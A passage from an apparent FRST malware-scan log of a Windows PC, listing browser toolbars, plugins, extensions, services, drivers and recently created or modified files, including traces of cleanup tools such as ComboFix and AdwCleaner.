Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
FF Plugin-x32: @InternetSpeedTracker_9t.com/Plugin - C:\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\NP9tStub.dll No File
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 - C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: DvrClientPlugin - C:\Program Files (x86)\DVRClient Plug-in\npDVRClient.dll ()
FF Plugin HKCU: bluejeans.com/bjninstallplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjninstallplugin_2.6.118.8.dll (Blue Jeans)
FF Plugin HKCU: bluejeans.com/bjnplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjnplugin_2.6.118.8.dll (Blue Jeans)
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\ []
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF [2013-11-25]

Chrome: 
=======
CHR HomePage: hxxp://www.google.com/
CHR StartupUrls: "hxxp://www.google.com/"
CHR DefaultSearchKeyword: ph.yahoo.com
CHR DefaultSearchProvider: Yahoo! Philippines
CHR DefaultSearchURL: http://ph.search.yahoo.com/search?ei={inputEncoding}&fr=crmas&p={searchTerms}
CHR DefaultNewTabURL: 
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll ()
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.450.18) - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java(TM) Platform SE 7 U45) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Live Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Shockwave for Director) - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll No File
CHR Extension: (Google Docs) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-25]
CHR Extension: (Google Drive) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-25]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-25]
CHR Extension: (YouTube) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-25]
CHR Extension: (Google Search) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-25]
CHR Extension: (Website Logon) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\debkinhcgejcbfgjiaalomcmkedjmiaa [2013-11-25]
CHR Extension: (Skype Click to Call) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-02-21]
CHR Extension: (Norton Identity Safe for Google Chrome™) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2013-11-25]
CHR Extension: (Google Wallet) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-25]
CHR Extension: (Gmail) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-25]
CHR HKLM-x32\...\Chrome\Extension: [debkinhcgejcbfgjiaalomcmkedjmiaa] - C:\Program Files (x86)\HP SimplePass 2012\tschrome.crx [2011-08-25]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-04-11]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\Exts\Chrome.crx [2014-05-16]

==================== Services (Whitelisted) =================

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390720 2014-04-11] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1764992 2014-04-11] (Microsoft Corporation)
R2 FPLService; C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe [260424 2011-08-26] (HP)
R2 irstrtsv; C:\Windows\SysWOW64\irstrtsv.exe [184320 2011-07-07] (Intel Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-05] (Symantec Corporation)
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe [276376 2014-05-11] (Symantec Corporation)
R2 UI Assistant Service; C:\Program Files (x86)\SMART BRO\AssistantServices.exe [274760 2012-10-24] ()

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [133672 2011-09-21] (Broadcom Corporation.)
R3 BHDrvx64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys [1530160 2014-05-10] (Symantec Corporation)
R3 BTWDPAN; C:\Windows\System32\DRIVERS\btwdpan.sys [89640 2011-09-21] (Broadcom Corporation.)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-04] (Symantec Corporation)
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1503000.00C\ccSetx64.sys [162392 2013-09-26] (Symantec Corporation)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [484952 2013-11-22] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [137648 2013-11-22] (Symantec Corporation)
R3 FLxHCIh; C:\Windows\System32\DRIVERS\FLxHCIh.sys [77040 2013-06-05] (Fresco Logic)
R3 IDSVia64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140530.001\IDSvia64.sys [525016 2014-03-26] (Symantec Corporation)
R3 irstrtdv; C:\Windows\System32\DRIVERS\irstrtdv.sys [26504 2011-06-16] (Intel Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140531.004\ENG64.SYS [126040 2014-04-20] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140531.004\EX64.SYS [2099288 2014-04-20] (Symantec Corporation)
R3 SRTSP; C:\Windows\System32\Drivers\NISx64\1503000.00C\SRTSP64.SYS [875736 2014-02-13] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1503000.00C\SRTSPX64.SYS [36952 2013-09-10] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMDS64.SYS [493656 2013-09-10] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-11-23] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1503000.00C\Ironx64.SYS [264280 2013-09-27] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS [593112 2014-02-18] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-06-01 17:11 - 2014-06-01 17:11 - 00025945 _____ () C:\Users\Hewlett Packard\Desktop\FRST.txt
2014-06-01 16:23 - 2014-06-01 16:23 - 00086552 _____ () C:\Users\Hewlett Packard\AppData\Local\GDIPFONTCACHEV1.DAT
2014-05-28 14:10 - 2014-05-28 14:10 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\NCWC
2014-05-27 19:00 - 2014-05-27 19:03 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Google
2014-05-27 18:24 - 2014-05-27 18:24 - 00380416 _____ () C:\Users\Hewlett Packard\Downloads\9kx0sxi1.exe
2014-05-27 18:13 - 2014-05-27 18:13 - 00030075 _____ () C:\Users\Hewlett Packard\Downloads\dds.txt
2014-05-27 18:13 - 2014-05-27 18:13 - 00008131 _____ () C:\Users\Hewlett Packard\Downloads\attach.txt
2014-05-27 18:05 - 2014-05-27 18:05 - 00016141 _____ () C:\Users\Hewlett Packard\Downloads\hijackthis.log
2014-05-27 17:58 - 2014-05-27 17:59 - 00688992 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\dds.scr
2014-05-27 17:56 - 2014-05-27 17:56 - 00388608 _____ (Trend Micro Inc.) C:\Users\Hewlett Packard\Downloads\HijackThis.exe
2014-05-27 17:09 - 2014-05-27 17:09 - 00062571 _____ () C:\Users\Hewlett Packard\Downloads\Shortcut.txt
2014-05-27 17:06 - 2014-06-01 16:50 - 00000000 ____D () C:\Users\Hewlett Packard\Downloads\FRST-OlderVersion
2014-05-27 15:38 - 2014-06-01 13:27 - 00110706 _____ () C:\Windows\WindowsUpdate.log
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Ralph Walker\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Public\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\hedev\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\dub_cm_auto\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default User\AppData\Local\temp
2014-05-27 13:04 - 2014-05-27 13:04 - 00033698 _____ () C:\ComboFix.txt
2014-05-27 12:37 - 2011-06-26 14:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-05-27 12:37 - 2010-11-08 01:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-05-27 12:37 - 2009-04-20 12:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00098816 _____ () C:\Windows\sed.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00080412 _____ () C:\Windows\grep.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00068096 _____ () C:\Windows\zip.exe
2014-05-27 12:35 - 2014-05-27 13:05 - 00000000 ____D () C:\Qoobox
2014-05-27 12:35 - 2014-05-27 12:59 - 00000000 ____D () C:\Windows\erdnt
2014-05-27 12:28 - 2014-05-27 12:28 - 05200919 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\username123.exe
2014-05-27 12:22 - 2014-05-27 12:22 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\adwcleaner_3.211.exe
2014-05-27 09:49 - 2014-05-27 09:49 - 00007606 _____ () C:\Users\Hewlett Packard\AppData\Local\Resmon.ResmonCfg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233429.reg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233404.reg
2014-05-26 23:33 - 2014-05-26 23:33 - 00012436 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233313.reg
2014-05-26 23:31 - 2014-05-26 23:32 - 00046014 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233124.reg
2014-05-25 20:12 - 2014-05-25 20:13 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\SkyCable
2014-05-25 18:58 - 2014-05-25 18:58 - 00001969 _____ () C:\Users\Public\Desktop\Samsung Kies 3.lnk
2014-05-25 18:58 - 2014-05-25 18:58 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\SelfMV
2014-05-25 18:58 - 2014-04-02 11:18 - 00144664 _____ (MAPILab Ltd. & Add-in Express Ltd.) C:\Windows\SysWOW64\secman.dll
2014-05-25 18:46 - 2014-04-11 16:39 - 00206080 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudmdm.sys
2014-05-25 18:46 - 2014-04-11 16:39 - 00110336 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudbus.sys
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Downloads\Rkill.txt
2014-05-25 07:01 - 2014-05-27 17:09 - 00031358 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-25 07:00 - 2014-05-27 17:11 - 00050845 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-05-25 06:57 - 2014-05-27 12:24 - 00000000 ____D () C:\AdwCleaner
2014-05-25 06:57 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-05-25 06:56 - 2014-06-01 17:11 - 00000000 ____D () C:\FRST
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:48 - 2014-06-01 16:50 - 02067456 _____ (Farbar) C:\Users\Hewlett Packard\Desktop\FRST64.exe
2014-05-25 05:46 - 2014-05-27 09:29 - 00000000 ____D () C:\NPE
2014-05-25 05:44 - 2014-05-27 09:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 04:13 - 2014-05-26 10:07 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-24 14:02 - 2014-05-24 14:02 - 00001137 _____ () C:\Users\Public\Desktop\Yahoo! Messenger.lnk
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Yahoo! Companion
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yahoo! Messenger
2014-05-23 18:58 - 2014-05-23 19:22 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 18:57 - 2014-05-23 19:09 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-20 23:55 - 2014-05-27 09:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader
2014-05-17 03:14 - 2014-05-06 12:40 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-17 03:14 - 2014-05-06 12:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:25 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-17 03:14 - 2014-05-06 11:07 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:00 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-17 03:14 - 2014-05-06 10:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-15 15:04 - 2014-05-09 14:14 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-15 15:04 - 2014-05-09 14:11 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-15 15:04 - 2014-04-12 10:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-05-15 15:04 - 2014-04-12 10:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-05-15 15:04 - 2014-04-12 10:19 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-05-15 15:04 - 2014-04-12 10:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:12 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:10 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-05-15 15:04 - 2014-03-25 10:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-05-15 15:04 - 2014-03-25 10:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-05-15 15:04 - 2014-03-04 17:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-05-15 15:04 - 2014-03-04 17:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-05-15 15:04 - 2014-03-04 17:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-07 09:22 - 2014-05-31 01:16 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-07 09:22 - 2014-05-17 03:31 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:50 - 2014-05-05 16:52 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in

==================== One Month Modified Files and Folders =======

2014-06-01 17:11 - 2014-06-01 17:11 - 00025945 _____ () C:\Users\Hewlett Packard\Desktop\FRST.txt
2014-06-01 17:11 - 2014-05-25 06:56 - 00000000 ____D () C:\FRST
2014-06-01 17:11 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Temp
2014-06-01 17:08 - 2013-10-31 21:39 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Outlook Files
2014-06-01 16:50 - 2014-05-27 17:06 - 00000000 ____D () C:\Users\Hewlett Packard\Downloads\FRST-OlderVersion
